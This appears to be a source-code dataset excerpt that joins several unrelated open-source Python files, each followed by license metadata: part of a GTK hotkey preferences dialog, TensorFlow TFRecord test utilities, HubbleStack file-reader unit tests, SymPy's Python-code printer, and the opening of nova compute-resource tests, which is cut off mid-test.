contents = contents.replace(" -c\n", "\n")
outFile.write(contents)
inFile.close()
outFile.close()
except:
pass
else:
if os.path.exists(AUTOSTART_FILE):
os.remove(AUTOSTART_FILE)
ConfigManager.SETTINGS[PROMPT_TO_SAVE] = self.promptToSaveCheckbox.get_active()
ConfigManager.SETTINGS[SHOW_TRAY_ICON] = self.showTrayCheckbox.get_active()
#ConfigManager.SETTINGS[MENU_TAKES_FOCUS] = self.allowKbNavCheckbox.get_active()
ConfigManager.SETTINGS[SORT_BY_USAGE_COUNT] = self.sortByUsageCheckbox.get_active()
ConfigManager.SETTINGS[UNDO_USING_BACKSPACE] = self.enableUndoCheckbox.get_active()
ConfigManager.SETTINGS[NOTIFICATION_ICON] = ICON_NAME_MAP[self.iconStyleCombo.get_active_text()]
self.configManager.userCodeDir = self.userModuleChooserButton.get_current_folder()
sys.path.append(self.configManager.userCodeDir)
configHotkey = self.configManager.configHotkey
toggleHotkey = self.configManager.toggleServiceHotkey
app = self.configManager.app
if configHotkey.enabled:
app.hotkey_removed(configHotkey)
configHotkey.enabled = self.useConfigHotkey
if self.useConfigHotkey:
self.showConfigDlg.save(configHotkey)
app.hotkey_created(configHotkey)
if toggleHotkey.enabled:
app.hotkey_removed(toggleHotkey)
toggleHotkey.enabled = self.useServiceHotkey
if self.useServiceHotkey:
self.toggleMonitorDlg.save(toggleHotkey)
app.hotkey_created(toggleHotkey)
app.update_notifier_visibility()
self.configManager.config_altered(True)
self.hide()
self.destroy()
def on_cancel(self, widget, data=None):
self.hide()
self.destroy()
def __getattr__(self, attr):
# Magic fudge to allow us to pretend to be the ui class we encapsulate
return getattr(self.ui, attr)
def __loadHotkey(self, item, label, dialog, clearButton):
dialog.load(item)
if item.enabled:
key = item.hotKey.encode("utf-8")
label.set_text(item.get_hotkey_string())
clearButton.set_sensitive(True)
return True
else:
label.set_text(_("(None configured)"))
clearButton.set_sensitive(False)
return False
# ---- Signal handlers
def on_showTrayCheckbox_toggled(self, widget, data=None):
self.iconStyleCombo.set_sensitive(widget.get_active())
def on_setConfigButton_pressed(self, widget, data=None):
self.showConfigDlg.run()
def on_config_response(self, res):
if res == Gtk.ResponseType.OK:
self.useConfigHotkey = True
key = self.showConfigDlg.key
modifiers = self.showConfigDlg.build_modifiers()
self.configKeyLabel.set_text(self.build_hotkey_string(key, modifiers))
self.clearConfigButton.set_sensitive(True)
def on_clearConfigButton_pressed(self, widget, data=None):
self.useConfigHotkey = False
self.clearConfigButton.set_sensitive(False)
self.configKeyLabel.set_text(_("(None configured)"))
self.showConfigDlg.reset()
def on_setMonitorButton_pressed(self, widget, data=None):
self.toggleMonitorDlg.run()
def on_monitor_response(self, res):
if res == Gtk.ResponseType.OK:
self.useServiceHotkey = True
key = self.toggleMonitorDlg.key
modifiers = self.toggleMonitorDlg.build_modifiers()
self.monitorKeyLabel.set_text(self.build_hotkey_string(key, modifiers))
self.clearMonitorButton.set_sensitive(True)
def on_clearMonitorButton_pressed(self, widget, data=None):
self.useServiceHotkey = False
self.clearMonitorButton.set_sensitive(False)
self.monitorKeyLabel.set_text(_("(None configured)"))
self.toggleMonitorDlg.reset()
| gpl-3.0 | -165,576,707,201,635,040 | 42.607656 | 107 | 0.651635 | false |
alsrgv/tensorflow | tensorflow/contrib/slim/python/slim/data/test_utils.py | 163 | 3795 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains test utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tensorflow.core.example import example_pb2
from tensorflow.core.example import feature_pb2
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.lib.io import tf_record
from tensorflow.python.ops import image_ops
def _encoded_int64_feature(ndarray):
return feature_pb2.Feature(int64_list=feature_pb2.Int64List(
value=ndarray.flatten().tolist()))
def _encoded_bytes_feature(tf_encoded):
encoded = tf_encoded.eval()
def string_to_bytes(value):
return feature_pb2.BytesList(value=[value])
return feature_pb2.Feature(bytes_list=string_to_bytes(encoded))
def _string_feature(value):
value = value.encode('utf-8')
return feature_pb2.Feature(bytes_list=feature_pb2.BytesList(value=[value]))
def _encoder(image, image_format):
assert image_format in ['jpeg', 'png']
if image_format == 'jpeg':
tf_image = constant_op.constant(image, dtype=dtypes.uint8)
return image_ops.encode_jpeg(tf_image)
if image_format == 'png':
tf_image = constant_op.constant(image, dtype=dtypes.uint8)
return image_ops.encode_png(tf_image)
def generate_image(image_shape, image_format='jpeg', label=0):
"""Generates an image and an example containing the encoded image.
GenerateImage must be called within an active session.
Args:
image_shape: the shape of the image to generate.
image_format: the encoding format of the image.
label: the int64 labels for the image.
Returns:
image: the generated image.
example: a TF-example with a feature key 'image/encoded' set to the
serialized image and a feature key 'image/format' set to the image
encoding format ['jpeg', 'png'].
"""
image = np.random.random_integers(0, 255, size=image_shape)
tf_encoded = _encoder(image, image_format)
example = example_pb2.Example(features=feature_pb2.Features(feature={
'image/encoded': _encoded_bytes_feature(tf_encoded),
'image/format': _string_feature(image_format),
'image/class/label': _encoded_int64_feature(np.array(label)),
}))
return image, example.SerializeToString()
def create_tfrecord_files(output_dir, num_files=3, num_records_per_file=10):
"""Creates TFRecords files.
The method must be called within an active session.
Args:
output_dir: The directory where the files are stored.
num_files: The number of files to create.
num_records_per_file: The number of records per file.
Returns:
A list of the paths to the TFRecord files.
"""
tfrecord_paths = []
for i in range(num_files):
path = os.path.join(output_dir,
'flowers.tfrecord-%d-of-%s' % (i, num_files))
tfrecord_paths.append(path)
writer = tf_record.TFRecordWriter(path)
for _ in range(num_records_per_file):
_, example = generate_image(image_shape=(10, 10, 3))
writer.write(example)
writer.close()
return tfrecord_paths
| apache-2.0 | 8,332,741,381,286,482,000 | 32.289474 | 80 | 0.704348 | false |
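# NOTE: usage sketch added for illustration; it is not part of the original
# test_utils.py. A default session must be active because generate_image()
# evaluates the encoder op, and the output directory below is just a
# temporary directory created for the demo.
if __name__ == '__main__':
  import tempfile
  from tensorflow.python.client import session
  with session.Session():
    paths = create_tfrecord_files(tempfile.mkdtemp(), num_files=1,
                                  num_records_per_file=2)
    print(paths)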
HubbleStack/Hubble | tests/unittests/test_readfile.py | 2 | 23431 | from __future__ import absolute_import
import json
import os
import sys
import yaml
import pytest
myPath = os.path.abspath(os.getcwd())
sys.path.insert(0, myPath)
import hubblestack.extmods.fdg.readfile
class TestReadfile():
'''
Class used to test the functions in ``readfile.py``
'''
def generate_data(self):
'''
        Helper function to generate dict data to populate json/yaml files
'''
sample_data = {"id": "file",
"value": {"key1": "value1",
"key2": {"key3": "value2"}},
"menuitem": ["item1", "item2", "item3"]}
return sample_data
@pytest.fixture(scope="session")
def json_file(self, tmpdir_factory):
'''
        Helper function that creates a ``.json`` sample file to test against
'''
sample_json = self.generate_data()
json_file = tmpdir_factory.mktemp("data").join("json_file.json")
json_file.write(str(json.dumps(sample_json)))
return str(json_file)
def test_json_InvalidPath_EmptyReturn(self):
'''
Test that given an invalid path, the json function returns False status
and None value
'''
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.json('/invalid/path')
assert expected_status == status
assert expected_ret == ret
def test_json_SingleSubkey_ReturnsValue(self, json_file):
'''
Test that given a single subkey argument, the function extracts the correct value
'''
expected_status, expected_ret = True, "file"
status, ret = hubblestack.extmods.fdg.readfile.json(json_file, subkey='id')
assert expected_status == status
assert expected_ret == ret
def test_json_InvalidSingleSubkey_EmptyReturn(self, json_file):
'''
Test that given an invalid single subkey argument,
the function returns False status and None value
'''
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.json(json_file, subkey='invalid_key')
assert expected_status == status
assert expected_ret == ret
def test_json_MultipleSubkeys_ReturnsValue(self, json_file):
'''
Test that given multiple subkeys, separated by a valid separator ``sep``,
the function returns the correct value
'''
expected_status, expected_ret = True, "value2"
status, ret = hubblestack.extmods.fdg.readfile.json(
json_file, subkey='value,key2,key3', sep=',')
assert expected_status == status
assert expected_ret == ret
def test_json_InvalidSep_EmptyReturn(self, json_file):
'''
        Test that given multiple subkeys separated by an invalid separator ``sep``,
the function returns False status and None value
'''
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.json(
json_file, subkey='value,key2,key3', sep='/')
assert expected_status == status
assert expected_ret == ret
def test_json_IndexSubkey_ReturnsValue(self, json_file):
'''
Test that given an index as subkey, the function returns the correct value
'''
expected_status, expected_ret = True, "item2"
status, ret = hubblestack.extmods.fdg.readfile.json(
json_file, subkey='menuitem,1', sep=',')
assert expected_status == status
assert expected_ret == ret
def test_json_InvalidIndexSubkey_EmptyReturn(self, json_file):
'''
Test that given an index as subkey that exceeds the list length,
the function returns False status and None value
'''
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.json(
json_file, subkey='menuitem,15', sep=',')
assert expected_status == status
assert expected_ret == ret
def test_json_EmptyFile_EmptyReturn(self, json_file):
'''
Test that given an empty json file, the function returns False status and None value
'''
with open(json_file, 'r+') as invalid_file:
invalid_file.truncate(0)
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.json(json_file, subkey='id')
assert expected_status == status
assert expected_ret == ret
def test_json_InvalidJsonFile_EmptyReturn(self, json_file):
'''
Test that given an invalid json file, the function returns False status and None value
'''
with open(json_file, 'w+') as invalid_file:
invalid_file.write("InvalidJson")
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.json(json_file, subkey='id')
assert expected_status == status
assert expected_ret == ret
@pytest.fixture(scope="session")
def yaml_file(self, tmpdir_factory):
'''
        Helper function that creates a ``.yaml`` sample file to test against
'''
sample_yaml = self.generate_data()
yaml_file = tmpdir_factory.mktemp("data").join("yaml_file.yaml")
yaml_file.write(str(yaml.dump(sample_yaml)))
return str(yaml_file)
def test_yaml_InvalidPath_EmptyReturn(self):
'''
Test that given an invalid path, the yaml function returns False status
        and None value
'''
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.yaml('/invalid/path')
assert expected_status == status
assert expected_ret == ret
def test_yaml_SingleSubkey_ReturnsValue(self, yaml_file):
'''
        Test that given a single subkey argument, the function extracts the appropriate value
'''
expected_status, expected_ret = True, "file"
status, ret = hubblestack.extmods.fdg.readfile.yaml(yaml_file, subkey='id')
assert expected_status == status
assert expected_ret == ret
def test_yaml_InvalidSingleSubkey_EmptyReturn(self, yaml_file):
'''
Test that given an invalid single subkey argument,
        the function returns False status and None value
'''
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.yaml(yaml_file, subkey='invalid_key')
assert expected_status == status
assert expected_ret == ret
def test_yaml_MultipleSubkeys_ReturnsValue(self, yaml_file):
'''
Test that given multiple subkeys, separated by a valid separator,
the function returns the appropriate value
'''
expected_status, expected_ret = True, "value2"
status, ret = hubblestack.extmods.fdg.readfile.yaml(
yaml_file, subkey='value,key2,key3', sep=',')
assert expected_status == status
assert expected_ret == ret
def test_yaml_InvalidSep_EmptyReturn(self, yaml_file):
'''
Test that given multiple subkeys separated by an invalid ``sep``,
the function returns a False status and None value
'''
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.yaml(
yaml_file, subkey='value,key2,key3', sep='/')
assert expected_status == status
assert expected_ret == ret
def test_yaml_IndexSubkey_ReturnsValue(self, yaml_file):
'''
Test that given an index as subkey, the function returns the appropriate value
'''
expected_status, expected_ret = True, "item2"
status, ret = hubblestack.extmods.fdg.readfile.yaml(
yaml_file, subkey='menuitem,1', sep=',')
assert expected_status == status
assert expected_ret == ret
def test_yaml_InvalidIndexSubkey_EmptyReturn(self, yaml_file):
'''
Test that given an index as subkey that exceeds the list length,
the function returns False status and None value
'''
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.yaml(
yaml_file, subkey='menuitem,15', sep=',')
assert expected_status == status
assert expected_ret == ret
def test_yaml_EmptyFile_EmptyReturn(self, yaml_file):
'''
Test that given an empty yaml file, the function returns False status and None value
'''
with open(yaml_file, 'r+') as invalid_file:
invalid_file.truncate(0)
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.yaml(yaml_file, subkey='id')
assert expected_status == status
assert expected_ret == ret
    def _test_yaml_InvalidYamlFile_EmptyReturn(self, yaml_file):
'''
Test that given an invalid yaml file, the function returns False status and None value
'''
with open(yaml_file, 'w+') as invalid_file:
invalid_file.write("invalidyaml")
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.yaml(yaml_file, subkey='id')
assert expected_status == status
assert expected_ret == ret
def test_checkPattern_EmptyPatternEmptyIgnore_ReturnTrue(self):
'''
Test that given an empty ``pattern`` and empty ``ignore_pattern``, the function returns True
'''
expected_ret = True
ret = hubblestack.extmods.fdg.readfile._check_pattern('Sample text', None, None)
assert expected_ret == ret
def test_checkPattern_EmptyPatternValidIgnore_ReturnFalse(self):
'''
Test that given an empty ``pattern`` and a valid ``ignore_pattern``,
the function returns False
'''
expected_ret = False
ret = hubblestack.extmods.fdg.readfile._check_pattern('invalid text', None, 'invalid.*')
assert expected_ret == ret
def test_checkPattern_EmptyPatternInvalidIgnore_ReturnTrue(self):
'''
Test that given an empty ``pattern`` and an invalid ``ignore_pattern``,
the function returns True
'''
expected_ret = True
ret = hubblestack.extmods.fdg.readfile._check_pattern('Sample text', None, 'invalid')
assert expected_ret == ret
def test_checkPattern_ValidPatternValidIgnore_ReturnFalse(self):
'''
        Test that given a valid ``pattern`` and a valid ``ignore_pattern``,
the function returns False
'''
expected_ret = False
line = 'valid and invalid text'
ret = hubblestack.extmods.fdg.readfile._check_pattern(line, 'valid.*', '.*invalid.*')
assert expected_ret == ret
def test_checkPattern_ValidPatternInvalidIgnore_ReturnTrue(self):
'''
        Test that given a valid ``pattern`` and an invalid ``ignore_pattern``,
the function returns True
'''
expected_ret = True
line = 'valid text'
ret = hubblestack.extmods.fdg.readfile._check_pattern(line, 'valid', 'invalid')
assert expected_ret == ret
def test_checkPattern_ValidPatternEmptyIgnore_ReturnTrue(self):
'''
        Test that given a valid ``pattern`` and an empty ``ignore_pattern``,
the function returns True
'''
expected_ret = True
line = 'valid text'
ret = hubblestack.extmods.fdg.readfile._check_pattern(line, 'valid', None)
assert expected_ret == ret
def test_checkPattern_InvalidPatternInvalidIgnore_ReturnFalse(self):
'''
        Test that given an invalid ``pattern`` and an invalid ``ignore_pattern``,
the function returns False
'''
expected_ret = False
line = 'Line with invalid text'
ret = hubblestack.extmods.fdg.readfile._check_pattern(line, 'bad pattern', 'bad ignore')
assert expected_ret == ret
def test_checkPattern_InvalidPatternValidIgnore_ReturnFalse(self):
'''
        Test that given an invalid ``pattern`` and a valid ``ignore_pattern``,
the function returns False
'''
expected_ret = False
line = 'Line with invalid text'
ret = hubblestack.extmods.fdg.readfile._check_pattern(line, 'bad pattern', '.*invalid.*')
assert expected_ret == ret
def test_checkPattern_InvalidPatternEmptyIgnore_ReturnFalse(self):
'''
        Test that given an invalid ``pattern`` and an empty ``ignore_pattern``,
the function returns False
'''
expected_ret = False
line = 'Line with invalid text'
ret = hubblestack.extmods.fdg.readfile._check_pattern(line, 'bad pattern', None)
assert expected_ret == ret
def test_processLine_ValidArguments_ReturnDict(self):
'''
Test that given valid arguments, the function returns a valid dictionary
'''
expected_key, expected_val = 'APP_ATTRIBUTES', {'cluster_role': 'controol',
'provider': 'aws',
'zone': '3'}
line = "APP_ATTRIBUTES=cluster_role:controol;zone:3;provider:aws"
key, val = hubblestack.extmods.fdg.readfile._process_line(
line, dictsep='=', valsep=';', subsep=':')
assert expected_key == key
assert expected_val == val
def test_processLine_ValidArgumentsDuplicateKeys_ReturnDict(self):
'''
Test that given valid arguments, if the input data contains duplicate keys,
they will be removed from the return dict
'''
expected_key, expected_val = 'APP_ATTRIBUTES', {'cluster_role': 'controol',
'provider': 'aws',
'zone': '3'}
line = "APP_ATTRIBUTES=cluster_role:controol;zone:6;provider:aws;zone:3"
key, val = hubblestack.extmods.fdg.readfile._process_line(
line, dictsep='=', valsep=';', subsep=':')
assert expected_key == key
assert expected_val == val
    def test_processLine_EmptyArguments_ReturnLine(self):
'''
Test that given empty arguments, the line is returned
'''
line = "line of text"
ret, none = hubblestack.extmods.fdg.readfile._process_line(line, None, None, None)
assert ret == line
assert none is None
def test_processLine_ValidDictsepValsepEmptySubsep_ReturnList(self):
'''
Test that given a valid ``dictsep``, a valid ``valsep`` and an empty ``subsep``,
a list is returned
'''
expected_key, expected_val = 'key0', ['key1', 'key2', 'val']
line = "key0:key1;key2;val"
key, val = hubblestack.extmods.fdg.readfile._process_line(line, ':', ';', None)
assert expected_key == key
assert expected_val == val
def test_processLine_ValidDictsepInvalidValsep_ReturnList(self):
'''
Test that given a valid ``dictsep`` and an invalid ``valsep``, a list is returned
'''
expected_key, expected_val = 'key0', ['key1;key2;val']
line = "key0:key1;key2;val"
key, val = hubblestack.extmods.fdg.readfile._process_line(line, ':', '-', None)
assert expected_key == key
assert expected_val == val
def test_processLine_ValidDictsepValsepInvalidSubsep_ReturnDict(self):
'''
Test that given a valid ``dictsep``, a valid ``valsep`` and an invalid ``subsep``,
a dict is returned
'''
expected_key, expected_val = 'APP_ATTRIBUTES', {'cluster_role:controol': None,
'provider:aws': None,
'zone:3': None}
line = "APP_ATTRIBUTES=cluster_role:controol;zone:3;provider:aws"
key, val = hubblestack.extmods.fdg.readfile._process_line(line, '=', ';', '-')
assert expected_key == key
assert expected_val == val
def test_processLine_ValidDictsepSubsepInvalidValsep_ReturnDict(self):
'''
Test that given a valid ``dictsep``, a valid ``subsep`` and an invalid ``valsep``,
a dict is returned
'''
expected_key, expected_val = 'key0', {'key1;val': 'val2'}
line = "key0:key1;val-val2"
key, val = hubblestack.extmods.fdg.readfile._process_line(line, ':', '.', '-')
assert expected_key == key
assert expected_val == val
def test_processLine_InvalidDictsep_ReturnLine(self):
'''
        Test that given an invalid ``dictsep``, the original line is returned
        together with a None value
'''
line = "key0:key1;val-val2"
ret, none = hubblestack.extmods.fdg.readfile._process_line(line, '?', '.', '-')
assert ret == line
assert none is None
def generate_config_data(self):
'''
Sample data to use for testing the ``config`` function
'''
sample_data = ["APP_ATTRIBUTES=cluster_role:control;zone:3;provider:aws",
"APP_ATTRIBUTES=cluster_role:worker;zone:1;provider:aws",
"APP_ATTRIBUTES=cluster_role:master;zone:0;provider:aws"]
return sample_data
@pytest.fixture(scope="session")
def config_file(self, tmpdir_factory):
'''
        Helper function that creates a config file to test the ``config`` function against
'''
sample_data = "\n".join(self.generate_config_data())
config_file = tmpdir_factory.mktemp("data").join("config_file")
config_file.write(sample_data)
return str(config_file)
def test_config_EmptyArguments_ReturnList(self, config_file):
'''
        Test that given empty arguments, the function returns a list with lines as elements
'''
expected_status, expected_ret = True, self.generate_config_data()
status, ret = hubblestack.extmods.fdg.readfile.config(config_file)
assert expected_status == status
assert expected_ret == ret
def test_config_InvalidPath_ReturnNone(self):
'''
Test that given an invalid ``path``, the function returns ``None``
'''
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.config('/invalid/path')
assert expected_status == status
assert expected_ret == ret
def test_config_OnlyDictsep_ReturnDict(self, config_file):
'''
Test that given a valid ``dictsep`` and empty arguments,
the function returns a valid ``dict``
'''
sample_data = self.generate_config_data()
expected_status, expected_ret = True, {"APP_ATTRIBUTES": [x.split("=")[1]
for x in sample_data]}
status, ret = hubblestack.extmods.fdg.readfile.config(config_file, dictsep="=")
assert expected_status == status
assert expected_ret == ret
def test_config_SamePatternIgnore_ReturnEmptyDict(self, config_file):
'''
        Test that given the same ``pattern`` and ``ignore_pattern``, the function returns an empty dict
'''
expected_status, expected_ret = True, {}
status, ret = hubblestack.extmods.fdg.readfile.config(
config_file, pattern="APP_ATTRIBUTES", ignore_pattern="APP_ATTRIBUTES", dictsep="=")
assert expected_status == status
assert expected_ret == ret
def test_config_InvalidDictsep_ReturnDict(self, config_file):
'''
Test that given an invalid ``dictsep`` and valid arguments,
the function returns a dict with values of ``None``
'''
sample_data = self.generate_config_data()
expected_status, expected_ret = True, {x: None for x in sample_data
if "master" not in x}
status, ret = hubblestack.extmods.fdg.readfile.config(
config_file, ignore_pattern=".*master.*", dictsep="?", valsep=';', subsep=':')
assert expected_status == status
assert expected_ret == ret
def test_config_ValidArguments_ReturnDict(self, config_file):
'''
Test that given valid arguments, the function returns a valid dict
'''
expected_status, expected_ret = True, {"APP_ATTRIBUTES": {
"cluster_role": "worker", "zone": "1", "provider":"aws"}}
status, ret = hubblestack.extmods.fdg.readfile.config(
config_file, pattern=".*(3|1).*", ignore_pattern=".*3.*",
dictsep="=", valsep=';', subsep=':')
assert expected_status == status
assert expected_ret == ret
def test_config_EmptyValsep_ReturnDict(self, config_file):
'''
Test that given valid arguments and an empty ``valsep``,
the function returns an incomplete dict
'''
expected_status, expected_ret = True, {"APP_ATTRIBUTES": {
"cluster_role": "control;zone:3;provider:aws"}}
status, ret = hubblestack.extmods.fdg.readfile.config(
config_file, pattern=".*control.*", dictsep="=", subsep=':')
assert expected_status == status
assert expected_ret == ret
def test_config_EmptySubsep_ReturnDict(self, config_file):
'''
Test that given valid arguments and an empty ``subsep``,
the function returns a dict with a list as value
'''
expected_status, expected_ret = True, {"APP_ATTRIBUTES": ["cluster_role:control",
"zone:3",
"provider:aws"]}
status, ret = hubblestack.extmods.fdg.readfile.config(
config_file, ignore_pattern=".*(worker|master).*", dictsep="=", valsep=';')
assert expected_status == status
assert expected_ret == ret
def test_readfileString_InvalidPath_emptyReturn(self):
'''
Test that given invalid arguments, the function returns False and None.
'''
expected_status, expected_ret = False, None
        status, ret = hubblestack.extmods.fdg.readfile.readfile_string('/invalid/path')
assert status == expected_status
assert ret == expected_ret
def test_readfileString_ValidPathFalseEncode_returnString(self, json_file):
'''
Test that given a valid path, the contents are returned as string with no encoding
'''
with open(json_file, 'w') as jfile:
jfile.writelines(["First line", "Second line", "Foo bar line"])
status, ret = hubblestack.extmods.fdg.readfile.readfile_string(json_file)
assert status == True
assert ret == "First lineSecond lineFoo bar line"
def test_readfileString_ValidPathTrueEncode_returnEncodedString(self, json_file):
'''
        Test that given a valid path, the contents are returned as a base64-encoded string
'''
with open(json_file, 'w') as jfile:
jfile.writelines(["Foo", "bar"])
status, ret = hubblestack.extmods.fdg.readfile.readfile_string(json_file, encode_b64=True)
assert status == True
# encoded Foobar
assert ret == 'Rm9vYmFy'
| apache-2.0 | 8,993,810,925,713,265,000 | 40.915921 | 100 | 0.606504 | false |
toolforger/sympy | sympy/printing/python.py | 118 | 3256 | # -*- coding: utf-8 -*-
from __future__ import print_function, division
import keyword as kw
import sympy
from .repr import ReprPrinter
from .str import StrPrinter
# A list of classes that should be printed using StrPrinter
STRPRINT = ("Add", "Infinity", "Integer", "Mul", "NegativeInfinity",
"Pow", "Zero")
class PythonPrinter(ReprPrinter, StrPrinter):
"""A printer which converts an expression into its Python interpretation."""
def __init__(self, settings=None):
ReprPrinter.__init__(self)
StrPrinter.__init__(self, settings)
self.symbols = []
self.functions = []
# Create print methods for classes that should use StrPrinter instead
# of ReprPrinter.
for name in STRPRINT:
f_name = "_print_%s" % name
f = getattr(StrPrinter, f_name)
setattr(PythonPrinter, f_name, f)
def _print_Function(self, expr):
func = expr.func.__name__
if not hasattr(sympy, func) and not func in self.functions:
self.functions.append(func)
return StrPrinter._print_Function(self, expr)
    # procedure (!) for defining symbols which have to be defined in print_python()
def _print_Symbol(self, expr):
symbol = self._str(expr)
if symbol not in self.symbols:
self.symbols.append(symbol)
return StrPrinter._print_Symbol(self, expr)
def _print_module(self, expr):
raise ValueError('Modules in the expression are unacceptable')
def python(expr, **settings):
"""Return Python interpretation of passed expression
(can be passed to the exec() function without any modifications)"""
printer = PythonPrinter(settings)
exprp = printer.doprint(expr)
result = ''
# Returning found symbols and functions
renamings = {}
for symbolname in printer.symbols:
newsymbolname = symbolname
# Escape symbol names that are reserved python keywords
if kw.iskeyword(newsymbolname):
while True:
newsymbolname += "_"
if (newsymbolname not in printer.symbols and
newsymbolname not in printer.functions):
renamings[sympy.Symbol(
symbolname)] = sympy.Symbol(newsymbolname)
break
result += newsymbolname + ' = Symbol(\'' + symbolname + '\')\n'
for functionname in printer.functions:
newfunctionname = functionname
# Escape function names that are reserved python keywords
if kw.iskeyword(newfunctionname):
while True:
newfunctionname += "_"
if (newfunctionname not in printer.symbols and
newfunctionname not in printer.functions):
renamings[sympy.Function(
functionname)] = sympy.Function(newfunctionname)
break
result += newfunctionname + ' = Function(\'' + functionname + '\')\n'
if not len(renamings) == 0:
exprp = expr.subs(renamings)
result += 'e = ' + printer._str(exprp)
return result
def print_python(expr, **settings):
"""Print output of python() function"""
print(python(expr, **settings))
| bsd-3-clause | -2,091,131,825,038,743,600 | 34.391304 | 80 | 0.609951 | false |
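# NOTE: usage sketch added for illustration; it is not part of the original
# module. The namespace below supplies the only external names the generated
# code relies on (Symbol/Function); everything else it defines itself.
if __name__ == '__main__':
    a, b = sympy.symbols('x y')
    code = python(a**2 + b)   # e.g. "x = Symbol('x')\ny = Symbol('y')\ne = x**2 + y"
    namespace = {'Symbol': sympy.Symbol, 'Function': sympy.Function}
    exec(code, namespace)
    assert namespace['e'] == a**2 + b
    print_python(a**2 + b)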
MountainWei/nova | nova/tests/unit/compute/test_resources.py | 57 | 11446 | # Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for the compute extra resources framework."""
from oslo_config import cfg
from stevedore import extension
from stevedore import named
from nova.compute import resources
from nova.compute.resources import base
from nova.compute.resources import vcpu
from nova import context
from nova.objects import flavor as flavor_obj
from nova import test
from nova.tests.unit import fake_instance
CONF = cfg.CONF
class FakeResourceHandler(resources.ResourceHandler):
def __init__(self, extensions):
self._mgr = \
named.NamedExtensionManager.make_test_instance(extensions)
class FakeResource(base.Resource):
def __init__(self):
self.total_res = 0
self.used_res = 0
def _get_requested(self, usage):
if 'extra_specs' not in usage:
return
if self.resource_name not in usage['extra_specs']:
return
req = usage['extra_specs'][self.resource_name]
return int(req)
def _get_limit(self, limits):
if self.resource_name not in limits:
return
limit = limits[self.resource_name]
return int(limit)
def reset(self, resources, driver):
self.total_res = 0
self.used_res = 0
def test(self, usage, limits):
requested = self._get_requested(usage)
if not requested:
return
limit = self._get_limit(limits)
if not limit:
return
free = limit - self.used_res
if requested <= free:
return
else:
return ('Free %(free)d < requested %(requested)d ' %
{'free': free, 'requested': requested})
def add_instance(self, usage):
requested = self._get_requested(usage)
if requested:
self.used_res += requested
def remove_instance(self, usage):
requested = self._get_requested(usage)
if requested:
self.used_res -= requested
def write(self, resources):
pass
def report_free(self):
return "Free %s" % (self.total_res - self.used_res)
class ResourceA(FakeResource):
def reset(self, resources, driver):
# ResourceA uses a configuration option
self.total_res = int(CONF.resA)
self.used_res = 0
self.resource_name = 'resource:resA'
def write(self, resources):
resources['resA'] = self.total_res
resources['used_resA'] = self.used_res
class ResourceB(FakeResource):
def reset(self, resources, driver):
# ResourceB uses resource details passed in parameter resources
self.total_res = resources['resB']
self.used_res = 0
self.resource_name = 'resource:resB'
def write(self, resources):
resources['resB'] = self.total_res
resources['used_resB'] = self.used_res
def fake_flavor_obj(**updates):
flavor = flavor_obj.Flavor()
flavor.id = 1
flavor.name = 'fakeflavor'
flavor.memory_mb = 8000
flavor.vcpus = 3
flavor.root_gb = 11
flavor.ephemeral_gb = 4
flavor.swap = 0
flavor.rxtx_factor = 1.0
flavor.vcpu_weight = 1
if updates:
flavor.update(updates)
return flavor
class BaseTestCase(test.NoDBTestCase):
def _initialize_used_res_counter(self):
# Initialize the value for the used resource
for ext in self.r_handler._mgr.extensions:
ext.obj.used_res = 0
def setUp(self):
super(BaseTestCase, self).setUp()
# initialize flavors and stub get_by_id to
# get flavors from here
self._flavors = {}
self.ctxt = context.get_admin_context()
# Create a flavor without extra_specs defined
_flavor_id = 1
_flavor = fake_flavor_obj(id=_flavor_id)
self._flavors[_flavor_id] = _flavor
# Create a flavor with extra_specs defined
_flavor_id = 2
requested_resA = 5
requested_resB = 7
requested_resC = 7
_extra_specs = {'resource:resA': requested_resA,
'resource:resB': requested_resB,
'resource:resC': requested_resC}
_flavor = fake_flavor_obj(id=_flavor_id,
extra_specs=_extra_specs)
self._flavors[_flavor_id] = _flavor
# create fake resource extensions and resource handler
_extensions = [
extension.Extension('resA', None, ResourceA, ResourceA()),
extension.Extension('resB', None, ResourceB, ResourceB()),
]
self.r_handler = FakeResourceHandler(_extensions)
        # Resource details can be passed to each plugin or can be specified as
# configuration options
driver_resources = {'resB': 5}
CONF.resA = '10'
# initialise the resources
self.r_handler.reset_resources(driver_resources, None)
def test_update_from_instance_with_extra_specs(self):
# Flavor with extra_specs
_flavor_id = 2
sign = 1
self.r_handler.update_from_instance(self._flavors[_flavor_id], sign)
expected_resA = self._flavors[_flavor_id].extra_specs['resource:resA']
expected_resB = self._flavors[_flavor_id].extra_specs['resource:resB']
